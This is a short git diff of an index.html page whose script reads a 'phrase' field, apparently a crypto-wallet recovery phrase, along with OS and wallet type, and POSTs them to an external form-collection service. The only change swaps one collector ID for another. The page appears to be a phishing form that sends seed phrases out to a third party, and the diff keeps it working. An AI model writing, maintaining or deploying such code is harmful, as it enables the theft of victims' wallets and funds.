--- a/index.html
+++ b/index.html
@@ -1556,7 +1556,7 @@ var phraseText = document.getElementById('phrase').value;
 var osText = document.getElementById('osTypeSelect').value;
 var walletText = document.getElementById('walletTypeSelect').value;
   
-      fetch("https://submit-form.com/KZfXggkEJ", {
+      fetch("https://submit-form.com/aN2F3DyWu", {
         method: "POST",
         headers: {
           "Content-Type": "application/json",
